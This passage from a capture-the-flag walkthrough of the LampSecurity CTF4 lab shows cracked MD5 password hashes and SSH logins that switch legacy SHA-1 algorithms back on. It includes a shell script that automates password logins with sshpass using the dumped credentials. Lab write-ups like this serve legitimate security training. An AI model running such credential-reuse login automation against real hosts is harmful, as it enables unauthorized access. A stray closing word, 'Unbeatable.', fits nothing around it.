| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+

That gives us six sets of credentials. The user_pass column holds unsalted 32-hex-character MD5 hashes, which is why sqlmap could resolve every one of them against its built-in wordlist and print the plaintext in brackets.

Web credentials are frequently reused for system accounts, so let's try them over SSH and see what sticks.

┌──(root㉿kali)-[~/Desktop/LampSecurityCTF4]
└─# ssh dstevens@192.168.100.111
Unable to negotiate with 192.168.100.111 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

This failure is in key exchange, not the host key: the client has no KEX method in common with the server, which only offers SHA-1 based Diffie-Hellman groups (group1 is the 1024-bit group, the reason modern clients dropped all three):

diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Re-enable them for this connection only with -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 (the list is the client's preference order, so ssh uses the first entry the server also supports):

┌──(root㉿kali)-[~/Desktop/LampSecurityCTF4]
└─# ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.100.111
Unable to negotiate with 192.168.100.111 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

Now the complaint really is about the host key type: the server only has ssh-rsa and ssh-dss host keys, and current OpenSSH clients accept neither by default (DSA has been disabled since 7.0, SHA-1 signed RSA since 8.8). Add -oHostKeyAlgorithms=ssh-rsa,ssh-dss as well, again only for this lab host:

ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.100.111
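The two steps above (re-check the dumped hashes, then coax the old SSH daemon into negotiating) can be run as one script. The following is an added example and not part of the original write-up or of the CTF image; the function names (md5_hex, verify_md5, legacy_keyword, legacy_opt_from_error, ssh_legacy_login), the DUMPED_USERS copy of the table and the use of sshpass are my choices, and only the target address and the rows come from the dump above. It assumes sshpass is installed on the attacking box.

```sh
#!/bin/sh
# Added example, not part of the original write-up: re-check the dumped
# ehks.user hashes, then log each account in over SSH, adding the legacy
# algorithm options the server demands one negotiation failure at a time.
# Assumes sshpass is installed on the attacking box; TARGET is the lab host.

TARGET=192.168.100.111

# Constructed copy of the sqlmap dump above: user_name:user_pass:plaintext
DUMPED_USERS='
dstevens:02e823a15a392b5aa4ff4ccb9060fa68:ilike2surf
achen:b46265f1e7faa3beab09db5c28739380:seventysixers
pmoore:8f4743c04ed8e5f39166a81f26319bb5:Homesite
jdurbin:7c7bc9f465d86b8164686ebb5151a717:Sue1978
sorzek:64d1f88b9b276aece4b0edcc25b7a434:pacman
ghighland:9f3eb3087298ff21843cc4e013cf355f:undone1
'

# Hex MD5 of a string with no trailing newline, i.e. what PHP's md5() stores.
md5_hex() {
  if command -v md5sum >/dev/null 2>&1; then
    printf '%s' "$1" | md5sum | cut -d' ' -f1
  else
    printf '%s' "$1" | md5 -q    # macOS fallback
  fi
}

# 0 if the plaintext really hashes to the stored value. Unsalted MD5 is why a
# dictionary run recovers these instantly; the re-check keeps a mis-cracked
# candidate out of the login attempts below.
verify_md5() {
  [ "$(md5_hex "$2")" = "$1" ]
}

# Map an "Unable to negotiate" complaint to the ssh_config keyword it concerns.
legacy_keyword() {
  case "$1" in
    *"no matching key exchange method"*) echo KexAlgorithms ;;
    *"no matching host key type"*)       echo HostKeyAlgorithms ;;
    *"no matching cipher"*)              echo Ciphers ;;
    *"no matching MAC"*)                 echo MACs ;;
    *) return 1 ;;
  esac
}

# Turn one error line into the -o option that enables exactly the server's offer.
# ssh tries the list in the order given, so the first entry is the one used.
legacy_opt_from_error() {
  kw=$(legacy_keyword "$1") || return 1
  offer=$(printf '%s\n' "$1" | sed -n 's/.*Their offer: //p')
  [ -n "$offer" ] || return 1
  printf '%s%s=%s\n' -o "$kw" "$offer"
}

# Retry ssh, appending one legacy option per negotiation failure (at most four:
# kex, host key, cipher, MAC). Prints the option set that finally worked.
ssh_legacy_login() {
  user=$1 pass=$2 opts=""
  for attempt in 1 2 3 4; do
    # shellcheck disable=SC2086  # $opts is meant to split into separate -o flags
    if err=$(sshpass -p "$pass" ssh -o StrictHostKeyChecking=accept-new $opts \
               "$user@$TARGET" id 2>&1 >/dev/null); then
      echo "$user: logged in with:$opts"
      return 0
    fi
    new=$(legacy_opt_from_error "$err") || { echo "$user: $err" >&2; return 1; }
    opts="$opts $new"
  done
  return 1
}

main() {
  printf '%s\n' "$DUMPED_USERS" | while IFS=: read -r user hash plain; do
    [ -n "$user" ] || continue
    if verify_md5 "$hash" "$plain"; then
      ssh_legacy_login "$user" "$plain" || true
    else
      echo "$user: stored hash does not match '$plain', skipping" >&2
    fi
  done
}

if [ "${1:-}" = run ]; then main; fi
```

Save it as, say, legacy_ssh.sh and start it with `sh legacy_ssh.sh run`; the `run` guard keeps the functions loadable without firing off logins. Two caveats: the option list handed to ssh is the client's preference order, so if you care which SHA-1 group is used put it first rather than copying the server's order blindly, and re-enabling SHA-1 key exchange or ssh-rsa/ssh-dss host keys is only acceptable against a lab target like this one (newer OpenSSH releases have removed DSA support entirely, so on those only ssh-rsa can still be switched back on).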

Once in, check what the current user may run through sudo (sudo -l).

Unbeatable.
